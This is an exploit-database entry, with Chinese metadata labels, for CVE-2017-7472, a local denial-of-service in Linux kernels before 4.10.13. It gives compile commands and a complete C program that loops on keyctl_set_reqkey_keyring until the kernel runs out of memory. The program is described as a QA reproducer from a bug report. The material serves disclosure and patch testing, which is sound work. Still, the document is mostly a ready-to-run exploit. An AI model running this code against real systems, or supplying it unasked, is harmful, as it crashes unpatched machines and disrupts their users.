Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service

  • 作者: Marcus Meissner
    日期: 2017-06-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42136/
  • /*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:

gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472

(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>

int main()
{
	for (;;)
		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}